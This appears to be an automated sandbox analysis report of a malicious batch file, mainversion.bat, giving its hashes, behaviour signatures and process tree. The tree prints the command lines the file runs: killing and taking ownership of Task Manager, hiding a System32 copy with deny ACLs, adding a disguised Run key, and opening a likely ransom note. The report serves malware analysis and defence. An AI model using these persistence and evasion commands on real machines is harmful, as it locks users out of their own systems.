Overview

overview

8

Static

static

1

mainversion.bat

windows7-x64

8

mainversion.bat

windows10-2004-x64

8

Resubmissions

28/03/2025, 23:13

250328-27d4aavpy6 8

28/03/2025, 23:11

250328-26lrqsvpx2 8

Analysis

  • max time kernel
    0s
  • max time network
    3s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28/03/2025, 23:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    mainversion.bat

  • Size

    3KB

  • MD5

    97422af7164bd8af68e3ff991ed685a5

  • SHA1

    46f9d4c9eb4be48b0579d9b5ce01ef0fed7cf3e4

  • SHA256

    3e45ddc08bb9c1604b399fd5e43546877bc0c290df087dd2697816b8eeadabaf

  • SHA512

    72a36da2099eb75da04bd0df431a67d2447eb25179339c6772946d64bc8fe1d4fc9b6fee5c43a18724baf4026c8fc8bd6e280c05d6216944be77892b876ea15e

Score
8/10
defense_evasiondiscoveryexploitpersistence

Malware Config

Signatures

  • Possible privilege escalation attempt 23 IoCs
    exploit
  • Sets file to hidden 1 TTPs 3 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    defense_evasion
  • Drops startup file 1 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
    discovery
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Kills process with taskkill 2 IoCs
    defense_evasion
  • Opens file in notepad (likely ransom note) 2 IoCs
    ransomware
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs
    defense_evasion

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\mainversion.bat"
    1⤵
    • Drops startup file
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:1156
    • C:\Windows\system32\msg.exe
      msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
      2⤵
        PID:1660
      • C:\Windows\system32\net.exe
        net session
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2288
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          3⤵
            PID:1872
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im taskmgr.exe
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3040
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\taskmgr.exe
          2⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2868
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\SysWOW64\taskmgr.exe
          2⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:700
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
          2⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2680
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
          2⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2740
        • C:\Windows\system32\attrib.exe
          attrib +s +h +r "C:\Windows\System32\flare.bat"
          2⤵
          • Sets file to hidden
          • Drops file in System32 directory
          • Views/modifies file attributes
          PID:2820
        • C:\Windows\system32\icacls.exe
          icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
          2⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2728
        • C:\Windows\system32\icacls.exe
          icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
          2⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2660
        • C:\Windows\system32\icacls.exe
          icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
          2⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:756
        • C:\Windows\system32\reg.exe
          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
          2⤵
          • Adds Run key to start application
          PID:2112
        • C:\Windows\system32\cmd.exe
          cmd.exe
          2⤵
            PID:2988
          • C:\Windows\system32\notepad.exe
            notepad "C:\Users\Admin\Desktop\flare_warning.txt"
            2⤵
            • Opens file in notepad (likely ransom note)
            PID:2692
          • C:\Windows\system32\icacls.exe
            icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
            2⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2860
          • C:\Windows\system32\icacls.exe
            icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
            2⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2848
          • C:\Windows\system32\icacls.exe
            icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
            2⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2932
          • C:\Windows\system32\icacls.exe
            icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
            2⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2560
          • C:\Windows\system32\icacls.exe
            icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
            2⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2556
          • C:\Windows\system32\icacls.exe
            icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
            2⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2280
          • C:\Windows\system32\icacls.exe
            icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
            2⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2668
          • C:\Windows\system32\icacls.exe
            icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
            2⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2696
          • C:\Windows\system32\icacls.exe
            icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
            2⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2824
          • C:\Windows\system32\attrib.exe
            attrib +s +h "C:\Users\Admin\Desktop\LPT2"
            2⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:2352
          • C:\Windows\system32\notepad.exe
            notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
            2⤵
            • Opens file in notepad (likely ransom note)
            PID:2536
          • C:\Windows\system32\cscript.exe
            cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
            2⤵
              PID:2548
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
                3⤵
                  PID:2224
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
                    4⤵
                      PID:2916
                      • C:\Windows\system32\msg.exe
                        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
                        5⤵
                          PID:2924
                        • C:\Windows\system32\net.exe
                          net session
                          5⤵
                            PID:1152
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 session
                              6⤵
                                PID:2592
                            • C:\Windows\system32\taskkill.exe
                              taskkill /f /im taskmgr.exe
                              5⤵
                              • Kills process with taskkill
                              PID:2792
                            • C:\Windows\system32\takeown.exe
                              takeown /f C:\Windows\System32\taskmgr.exe
                              5⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:2948
                            • C:\Windows\system32\takeown.exe
                              takeown /f C:\Windows\SysWOW64\taskmgr.exe
                              5⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:2800
                            • C:\Windows\system32\icacls.exe
                              icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
                              5⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:1976
                            • C:\Windows\system32\icacls.exe
                              icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
                              5⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:2432
                            • C:\Windows\system32\attrib.exe
                              attrib +s +h +r "C:\Windows\System32\flare.bat"
                              5⤵
                              • Sets file to hidden
                              • Views/modifies file attributes
                              PID:1724
                            • C:\Windows\system32\icacls.exe
                              icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
                              5⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:2896
                            • C:\Windows\system32\icacls.exe
                              icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
                              5⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:1224
                            • C:\Windows\system32\icacls.exe
                              icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
                              5⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:1752
                            • C:\Windows\system32\reg.exe
                              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
                              5⤵
                                PID:1704
                        • C:\Windows\system32\cmd.exe
                          cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
                          2⤵
                            PID:2152
                          • C:\Windows\system32\timeout.exe
                            timeout /t 1
                            2⤵
                            • Delays execution with timeout.exe
                            PID:2700

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
                          Filesize

                          142B

                          MD5

                          a918e39e90540829b11e66ea68102b54

                          SHA1

                          b42ac88ad6a6d4fe99460a99b286748003a5326e

                          SHA256

                          007f1e45ce7381c2bdc57c7f4bce9be2d471dc9c76ebf520e0f7338359787435

                          SHA512

                          08165746cae6ee71f4a0e8a268cc1b88e26b5e1ffa266905d1005ffe361d61de6b116974e2c3bbd25b8bbbe86a418968192bf28bf6013883f049a1e678c2eeb1

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error.bat
                          Filesize

                          11B

                          MD5

                          9905e5a33c6edd8eb5f59780afbf74de

                          SHA1

                          64b2cd0186ff6fe05072ee88e2bb54476023772e

                          SHA256

                          c134b2f85415ba5cfce3e3fe4745688335745a9bb22152ac8f5c77f190d8aee3

                          SHA512

                          e10711d0fb09db27192e9af05ae45b83cf3882d98e904a7f1f969cf24c2f9626f70f35d76f57477fe9c64a58bc74100410740e9d506d4e72d3e2900d6277816e

                          Download Submit

                        • C:\Users\Admin\Desktop\LPT2\Fixes.txt
                          Filesize

                          36B

                          MD5

                          9ea9c312f34cfeda8394b84c0dfd1fc9

                          SHA1

                          d587d14e675fa07820e4a3c513285b42831c90bf

                          SHA256

                          4bfc6d2ad894c24dcedc920096679c80c1dd4340528ba9a071cff8b9bf8ab9e7

                          SHA512

                          0ed43563d7e3492773d30abdad9199b5cb9fd49ffb32c0c0a9cc1471545991131644b81c61f70f0f062ee9ab5314005b7677982c8074696aa832b226cd32ca8d

                          Download Submit

                        • C:\Users\Admin\Desktop\flare_warning.txt
                          Filesize

                          85B

                          MD5

                          06f0a7e183c60d2d25359f8805ac79c8

                          SHA1

                          88dcb58b0342aaa5d26fbcc4f331980280d8788e

                          SHA256

                          c4ee6d94b5725af6c1ed91eb62fc34db9be62aca661976a5c24bdbb3db24e1d6

                          SHA512

                          ee60f735fcee65e0c76a9240b660bb850f285900d5229dcf102d244e14248b24f5f102523efee659f4de6ac339fa1f554e36a712bd3209a4f3ab1897a63314b3

                          Download Submit

                        • C:\Windows\System32\flare.bat
                          Filesize

                          3KB

                          MD5

                          97422af7164bd8af68e3ff991ed685a5

                          SHA1

                          46f9d4c9eb4be48b0579d9b5ce01ef0fed7cf3e4

                          SHA256

                          3e45ddc08bb9c1604b399fd5e43546877bc0c290df087dd2697816b8eeadabaf

                          SHA512

                          72a36da2099eb75da04bd0df431a67d2447eb25179339c6772946d64bc8fe1d4fc9b6fee5c43a18724baf4026c8fc8bd6e280c05d6216944be77892b876ea15e

                          Download Submit